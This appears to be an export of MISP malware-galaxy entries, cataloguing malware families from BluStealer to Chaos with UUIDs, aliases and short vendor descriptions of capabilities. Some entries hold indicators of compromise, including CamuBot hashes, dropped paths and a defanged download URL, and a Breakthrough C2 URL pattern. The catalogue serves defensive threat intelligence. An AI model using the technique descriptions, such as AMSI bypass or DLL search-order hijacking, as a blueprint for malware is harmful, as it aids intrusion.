Avast describe this malware as a recombination of other malware including SpyEx, ThunderFox, ChromeRecovery, StormKitty, and firepwd.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BluStealer.

Known Synonyms
`a310logger`

Internal MISP references

UUID cb4bfed3-3042-4a29-a72d-c8b5c510faea which can be used as unique global reference for BluStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BMANAGER

Internal MISP references

UUID c26b2dd3-4641-4174-977d-6813f2181a05 which can be used as unique global reference for BMANAGER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BOATLAUNCH

FIN7 uses this malware as helper module during intrusion operations. BOATLAUNCH is continuously looking for PowerShell processes on infected systems and patches them to bypuss Windows AntiMalware Scan Interface (AMSI).

Internal MISP references

UUID 13e62fe0-af0e-4a44-8437-ed86101f12d4 which can be used as unique global reference for BOATLAUNCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Boaxxe

Internal MISP references

UUID 2f11eb73-4faa-48c5-b217-11e139962c6f which can be used as unique global reference for Boaxxe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bobik

This malware offers remote access capabilities but also has a DDoS module that was used against supporters of Ukraine.

Internal MISP references

UUID 71a2182f-1010-496d-8c20-7a60639adff1 which can be used as unique global reference for Bobik in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BockLit

According to Trend Micro, this is a ransomware written in Go, targeting Windows and MacOS environments that tries to disguise as LockBit by changing the wallpaper into a LockBit 2 screen. Most of the samples contained hard-coded AWS credentials, and the stolen data were uploaded to an Amazon S3 bucket controlled by the threat actor.

Internal MISP references

UUID a7863070-0dd0-4176-8ab8-4630ef615c0f which can be used as unique global reference for BockLit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bohmini

Internal MISP references

UUID 444ca9d1-7128-40fa-9665-654194dfbe0b which can be used as unique global reference for Bohmini in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini - webarchive

Associated metadata

Metadata key	Value
type	[]

BOLDMOVE (Windows)

According to Mandiant, this malware family is attributed to potential chinese background and its Linux variant is related to exploitation of Fortinet's SSL-VPN (CVE-2022-42475).

Internal MISP references

UUID 4212b386-b6de-4b06-86f1-ba20b5c01447 which can be used as unique global reference for BOLDMOVE (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bolek

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bolek.

Known Synonyms
`KBOT`

Internal MISP references

UUID d3af810f-e657-409c-b821-4b1cf727ad18 which can be used as unique global reference for Bolek in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BookCodes RAT

BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim’s filesystem, basic process management and the download and execution of additional tools from the attacker’s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646.

BookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BookCodes RAT.

Known Synonyms
`BookCodesTea`

Internal MISP references

UUID 433b9a1c-dd2a-4d2b-b469-47b40fc6c196 which can be used as unique global reference for BookCodes RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Book of Eli

This in .Net written malware is a classic information stealer. It can collect various information and can be depoyed in different configurations: "The full-featured version of the malware can log keystrokes, collect profile files of Mozilla Firefox and Google Chrome browsers, record sound from the microphone, grab desktop screenshots, capture photo from the webcam, and collect information about the version of the operation system and installed anti-virus software." (ESET) This malware has been active since at least 2012.

Internal MISP references

UUID 2029a6f7-f98e-4582-bc5b-7ff0188f1af2 which can be used as unique global reference for Book of Eli in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bookworm

Internal MISP references

UUID 1b8cfb29-7a63-459a-bc90-c9ea3634b21c which can be used as unique global reference for Bookworm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BOOMBOX

Internal MISP references

UUID e8112e1a-4fda-4857-8df8-0ba7fb5ea1ba which can be used as unique global reference for BOOMBOX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BOOSTWRITE

FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

Internal MISP references

UUID a24eb119-d526-4aa4-ab5f-171ccddd4fbc which can be used as unique global reference for BOOSTWRITE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BOOTWRECK

BOOTWRECK is a master boot record wiper malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BOOTWRECK.

Known Synonyms
`MBRkiller`

Internal MISP references

UUID 174b9314-765e-44d0-a761-10d352f4466c which can be used as unique global reference for BOOTWRECK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Borat RAT

The Borat RAT comes bundled with its components (e.g. binary builder, supporting modules, server certificates). According to Cyble this malware is an unique combination of RAT, Spyware, and ransomware. The supporting modules are included; a few of the capabilities: Keylogger, Ransomware, Audio/Webcam Recording, Process Hollowing, Browser Credential/Discord Token Stealing, etc.

Internal MISP references

UUID 7ff0b462-c5be-40fa-82da-7efe93722f92 which can be used as unique global reference for Borat RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Borr

Internal MISP references

UUID e016e652-8d02-45c4-a268-fe4c588ebd3d which can be used as unique global reference for Borr in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BottomLoader

Internal MISP references

UUID 450133c9-b40c-4526-a669-5d5cc55276d5 which can be used as unique global reference for BottomLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bouncer

Internal MISP references

UUID 80487bca-7629-4cb2-bf5b-993d5568b699 which can be used as unique global reference for Bouncer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BoxCaon

According to Checkpoint Research, this malware family has the ability to download and upload files, run commands and send the attackers the results. It has been observed being used by threat actor IndigoZebra.

Internal MISP references

UUID 5ccb9d4c-bb9b-48ee-9ea3-a64a81eb210f which can be used as unique global reference for BoxCaon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bozok

Internal MISP references

UUID f9d0e934-879c-4668-b959-6bf7bdc96f5d which can be used as unique global reference for Bozok in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BRAIN

Internal MISP references

UUID 1619ee64-fc54-47c0-8ee1-8b786fefc0fd which can be used as unique global reference for BRAIN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Brambul

Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Brambul.

Known Synonyms
`SORRYBRUTE`

Internal MISP references

UUID d97ae60e-612a-4feb-908a-8c4d32e9d763 which can be used as unique global reference for Brambul in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BravoNC

Internal MISP references

UUID fbed27da-551d-4793-ba7e-128256326909 which can be used as unique global reference for BravoNC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BrbBot

Internal MISP references

UUID b9a4455a-ad55-4858-9017-bb73a8640045 which can be used as unique global reference for BrbBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BreachRAT

This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb

Internal MISP references

UUID 52cf2986-89e8-463d-90b6-e4356c9777e7 which can be used as unique global reference for BreachRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Breakthrough

There is no reference available for this family and all known samples have version 1.0.0.

Pdb-strings in the samples suggest that this is an "exclusive" loader, known as "breakthrough" (maybe), e.g. C:\Users\Exclusiv\Desktop\хп-пробив\Release\build.pdb

The communication url parameters are pretty unique in this combination: gate.php?hwid=&os=&build=1.0.0&cpu=8

is one of: Windows95 Windows98 WindowsMe Windows95family WindowsNT3 WindowsNT4 Windows2000 WindowsXP WindowsServer2003 WindowsNTfamily WindowsVista Windows7 Windows8 Windows10

Internal MISP references

UUID a05b8e4b-a686-439f-8094-037fbcda52bd which can be used as unique global reference for Breakthrough in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader - webarchive

Associated metadata

Metadata key	Value
type	[]

Bredolab

Internal MISP references

UUID 55d343a1-7e80-4254-92eb-dfb433b91a90 which can be used as unique global reference for Bredolab in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BrittleBush

Internal MISP references

UUID fd4665b8-59b6-427f-a22d-bb3b50e9e176 which can be used as unique global reference for BrittleBush in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BROKEYOLK

According to Mandiant, BROKEYOLK is a .NET downloader that downloads and executes a file from a hard-coded command and control (C2) server. The malware communicates via SOAP (Simple Object Access Protocol) requests using HTTP.

Internal MISP references

UUID dd19501d-c23e-4a52-8cef-726a8483d6c2 which can be used as unique global reference for BROKEYOLK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BROLER

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BROLER.

Known Synonyms
`down_new`

Internal MISP references

UUID 9a544700-13e3-490f-ae4e-45b3fd159546 which can be used as unique global reference for BROLER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Broomstick

Oyster is a backdoor malware written in C++, first appearing in July 2023. It allows for remote sessions, supporting tasks like file transfer and command-line processing. This malware has been used by numerous threat actors as a tool to support ransomware intrusions. The distribution of Oyster has most likely been spread through various methods, which is suggested by the build identifiers in examined samples. Additionally, Oyster is capable of collecting basic system data and communicates with a command-and-control server (C2). It can execute commands via cmd.exe and run additional files.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Broomstick.

Known Synonyms
`CLEANBOOST`
`CleanUp`
`CleanUpLoader`
`Oyster`

Internal MISP references

UUID 10072fed-e5ef-4c97-9fe8-ca33f1e0b1f6 which can be used as unique global reference for Broomstick in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bruh Wiper

Internal MISP references

UUID 33b76b3f-7056-4892-a134-6e984f500c3c which can be used as unique global reference for Bruh Wiper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BrushaLoader

Internal MISP references

UUID 75a03c4f-8a97-4fc0-a69e-b2e73e4564fc which can be used as unique global reference for BrushaLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Brute Ratel C4

Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Brute Ratel C4.

Known Synonyms
`BOLDBADGER`
`BruteRatel`

Internal MISP references

UUID 19e4df44-d469-4903-8999-22d650a21dd7 which can be used as unique global reference for Brute Ratel C4 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BrutPOS

Internal MISP references

UUID e413c33a-badd-49a1-8d44-c9a0983b5151 which can be used as unique global reference for BrutPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BS2005

Internal MISP references

UUID 35e00ff0-704e-4e61-b9bb-9ed20a4a008f which can be used as unique global reference for BS2005 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BTCWare

According to PCRisk, BTCWare is an updated version of a ransomware-type virus called Crptxxx. This ransomware is distributed via a malicious application called "Rogers Hi-Speed Internet". Once infiltrated, BTCWare encrypts files and appends filenames with the ".btcware" extension. Newer variants of this ransomware append .shadow, .payday, .wyvern, .nuclear, .aleta, .gryphon, .nopasaran, .blocking, .xfile, .master, .onyon, .theva, .cryptobyte or .cryptowin extensions to encrypted files. BTCWare then creates an HTM file ("#HOW_TO_FIX!.hta.htm"), placing it on the desktop. Other variants of this ransomware use !#RESTORE_FILES#!.inf file to store their ransom demanding message.

Internal MISP references

UUID d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8 which can be used as unique global reference for BTCWare in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BUBBLEWRAP

BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.

Internal MISP references

UUID d114ee6c-cf7d-408a-8077-d59e736f5a66 which can be used as unique global reference for BUBBLEWRAP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Buer

Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buer.

Known Synonyms
`Buerloader`
`RustyBuer`

Internal MISP references

UUID b908173c-c89e-400e-b69d-da411120dae2 which can be used as unique global reference for Buer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BUFFETLINE

Internal MISP references

UUID eca37457-cdd4-44c7-ad07-7a4a863e8765 which can be used as unique global reference for BUFFETLINE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BUGHATCH

According to Elastic, BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject).

Internal MISP references

UUID d05f8cfe-ae3f-4468-9c48-90124b59ccda which can be used as unique global reference for BUGHATCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

bugsleep

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular bugsleep.

Known Synonyms
`MuddyRot`

Internal MISP references

UUID edbe6c15-6ce8-4927-9f74-0504f0711049 which can be used as unique global reference for bugsleep in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Buhtrap

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buhtrap.

Known Synonyms
`Ratopak`

Internal MISP references

UUID fa278536-8293-4717-86b5-8a03aa11063f which can be used as unique global reference for Buhtrap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BumbleBee

This malware is delivered by an ISO file, with an DLL inside with a custom loader. Because of the unique user-agent "bumblebee" this malware was dubbed BUMBLEBEE. At the time of Analysis by Google's Threat Analysis Group (TAG) BumbleBee was observed to fetch Cobalt Strike Payloads.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BumbleBee.

Known Synonyms
`COLDTRAIN`
`SHELLSTING`
`Shindig`

Internal MISP references

UUID fa47d59d-7251-468f-9d84-6e1ba21887db which can be used as unique global reference for BumbleBee in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bundestrojaner

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bundestrojaner.

Known Synonyms
`0zapftis`
`R2D2`

Internal MISP references

UUID 04aeda9f-7923-45d1-ab74-9dddd8612d47 which can be used as unique global reference for Bundestrojaner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BundleBot

Bundlebot is an info stealer that abuses the single-file dotnet bundle which operates as a self-contained executable that does not require any preinstalled dotnet runtime version. Bundlebot functionality targets a wide variety of data including the victim's system information, browser data, telegram data, discord token, Facebook account information, and screenshots.

Internal MISP references

UUID d63eb20b-6a3f-4d96-a52d-8395f1868389 which can be used as unique global reference for BundleBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bunitu

Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).

Internal MISP references

UUID 4350b52a-8100-49b5-848d-d4a4029e949d which can be used as unique global reference for Bunitu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BunnyLoader

Internal MISP references

UUID 051f6280-da83-4a5b-b61c-3425c9018df5 which can be used as unique global reference for BunnyLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Buterat

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buterat.

Known Synonyms
`spyvoltar`

Internal MISP references

UUID cd4ee7f0-394e-4129-a1dc-d5fb423f2311 which can be used as unique global reference for Buterat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Buzus

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buzus.

Known Synonyms
`Yimfoca`

Internal MISP references

UUID 69a3e0ed-1727-4a9c-ae21-1e32322ede93 which can be used as unique global reference for Buzus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BYEBY

Internal MISP references

UUID 12886243-55b6-4864-bf7a-7e2439e3a4c1 which can be used as unique global reference for BYEBY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

c0d0so0

Internal MISP references

UUID b6b187d0-e19f-489a-91c0-7c94519555f6 which can be used as unique global reference for c0d0so0 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0 - webarchive

Associated metadata

Metadata key	Value
type	[]

CabArt

Internal MISP references

UUID fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c which can be used as unique global reference for CabArt in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart - webarchive

Associated metadata

Metadata key	Value
type	[]

Cactus

Internal MISP references

UUID 2ff26425-93b6-46ad-9c39-28eb9dbc3974 which can be used as unique global reference for Cactus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CaddyWiper

CaddyWiper is another destructive malware believed to be deployed to target Ukraine.

CaddyWiper wipes all files under C:\Users and all also all files under available drives from D: to Z: by overwriting the data with NULL value. If the target file is greater than 0xA00000 bytes in size (10MB), it will only wipe the first 0xA00000 bytes.

It also wipes disk partitions from \.\PHYSICALDRIVE9 to \.\PHYSICALDRIVE0 by overwriting the first 0x780 bytes with NULL.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CaddyWiper.

Known Synonyms
`KillDisk.NCX`

Internal MISP references

UUID c6053700-5f3b-48cc-8176-191393522fc3 which can be used as unique global reference for CaddyWiper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CadelSpy

CadelSpy is a spyware supposedly used by Iranian threat actors. It has several functions such as logging keystrokes, record audio, capture screenshots and webcam photos, and steal any documents that are sent to a printer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CadelSpy.

Known Synonyms
`Cadelle`

Internal MISP references

UUID cad83c5e-2081-4ab4-81c7-32cfc16eae66 which can be used as unique global reference for CadelSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CALMTHORN

Internal MISP references

UUID 52c0b49b-d57e-400d-8808-a00d4171ac05 which can be used as unique global reference for CALMTHORN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cameleon

PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cameleon.

Known Synonyms
`StormKitty`

Internal MISP references

UUID d3fb548f-64cb-4997-8262-1dca695fbae2 which can be used as unique global reference for Cameleon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

campoloader

Internal MISP references

UUID 2bf8ef91-a220-49aa-a7b9-0437d2ee0b15 which can be used as unique global reference for campoloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CamuBot

There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :

CamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479

Dropped Files on disk :

C:\Users\user~1\AppData\Local\Temp\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1

C:\Users\user~1\AppData\Local\Temp\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8

C:\ProgramData\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190

Protecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi

A new driver is installed : C:\Windows\system32\drivers\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8

ftusbload2.sys set 28 IRP handlers.

Internal MISP references

UUID ecac83ab-cd64-4def-979a-40aeeca0400b which can be used as unique global reference for CamuBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cannibal Rat

Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.

Internal MISP references

UUID 1e722d81-085e-4beb-8901-aa27fe502dba which can be used as unique global reference for Cannibal Rat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cannon

Internal MISP references

UUID 3fada5b6-0b3d-4b83-97c9-2157c959704c which can be used as unique global reference for Cannon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Carbanak

MyCERT states that Carbanak is a remote backdoor designed for espionage, data exfiltration, and to remote control.

The attacker deploy malware via spear phishing email to lure the user to open and run the malicious attachment that will infect the machine. The main objective of this campaign is primarily to remotely control the infected machine and gain control of the internal destinations of money processing services such as Automated Teller Machines(ATM) and financial accounts. The following information are the malware capabilities:

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Carbanak.

Known Synonyms
`Anunak`
`Sekur RAT`

Internal MISP references

UUID 8c246ec4-eaa5-42c0-b137-29f28cbb6832 which can be used as unique global reference for Carbanak in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Carberp

Internal MISP references

UUID 8f0d4866-7c67-4376-a6f2-958224d3c9d0 which can be used as unique global reference for Carberp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cardinal RAT

Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.

Internal MISP references

UUID 3d3da4c0-004c-400c-9da6-f83fd35d907e which can be used as unique global reference for Cardinal RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CargoBay

CargoBay is a newer malware family which was first observed in 2022 and is notable for being written in the Rust language. CargoBay is likely based on source code taken from 'Black Hat Rust' GitHub project (https://github.com/skerkour/black-hat-rust). CargoBay is usually distributed via phishing emails, and the malware binaries may be disguised as legitimate applications. Upon execution, the malware starts by performing environmental checks such as checking its execution path and the configured system language. If the tests pass, then the malware proceeds to gather basic system information and register with its C2 via HTTP from which it receives JSON-formatted jobs to carry out. CargoBay can execute commands via the command line and downloading additional malware binaries.

Internal MISP references

UUID cfdc931d-d3da-4b2a-9fef-42592c0f5c5f which can be used as unique global reference for CargoBay in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CARROTBALL

CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.

Internal MISP references

UUID cca82b51-fef9-4f33-a2f5-418b80d0966d which can be used as unique global reference for CARROTBALL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CarrotBat

Internal MISP references

UUID 4ad06a5f-12e6-44ae-9547-98ee62114357 which can be used as unique global reference for CarrotBat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Casper

ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.

Internal MISP references

UUID 3198501e-0ff0-43b7-96f0-321b463ab656 which can be used as unique global reference for Casper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CatB

Internal MISP references

UUID a96445d6-4bbb-4b9a-a761-83759108a403 which can be used as unique global reference for CatB in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Catchamas

Internal MISP references

UUID 8060dbdc-cf31-40bc-9900-eb8119423c50 which can be used as unique global reference for Catchamas in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CCleaner Backdoor

According to CrowdStrike, this backdoor was discovered embedded in the legitimate, signed version of CCleaner 5.33, and thus constitutes a supply chain attack.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CCleaner Backdoor.

Known Synonyms
`DIRTCLEANER`

Internal MISP references

UUID c51ee09b-fc2d-41fd-a43b-426a4f337139 which can be used as unique global reference for CCleaner Backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CEELOADER

Mandiant characterizes this malware as a downloader and shellcode stager.

Internal MISP references

UUID 0333d13e-e01f-46cd-a030-448bbf043c10 which can be used as unique global reference for CEELOADER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CenterPOS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CenterPOS.

Known Synonyms
`cerebrus`

Internal MISP references

UUID fca8c5e0-4fef-408c-bcd7-9826271e8e5d which can be used as unique global reference for CenterPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cerber

A prolific ransomware which originally added ".cerber" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.

Internal MISP references

UUID 79a7203a-6ea5-4c39-abd4-faa20cf8821a which can be used as unique global reference for Cerber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CetaRAT

Internal MISP references

UUID 12d2d503-def6-4161-bd42-2093ccad49bd which can be used as unique global reference for CetaRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChaChi

Internal MISP references

UUID 6a3e6f07-1aaa-4af5-8bd3-96898aca3510 which can be used as unique global reference for ChaChi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chaes

This malware made its first appearance during the middle to end of 2020, it specifically targets Brazil and the largest e-commerce company in Latin America, Mercado Livre. It is a multistage malware deployment which uses several legitimate Windows processes and open source tools to remain undetected.

Internal MISP references

UUID 0d4ab3af-189f-49af-b47a-9b25f59f9a12 which can be used as unique global reference for Chaes in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chainshot

Internal MISP references

UUID 36f9a5e0-9a78-4b9a-9072-1596c91b59b6 which can be used as unique global reference for Chainshot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CHAIRSMACK

Internal MISP references

UUID f049e626-7de2-4648-81db-53dfd34f2fab which can be used as unique global reference for CHAIRSMACK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chaos (Windows)

In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chaos (Windows).

Known Synonyms
`FakeRyuk`
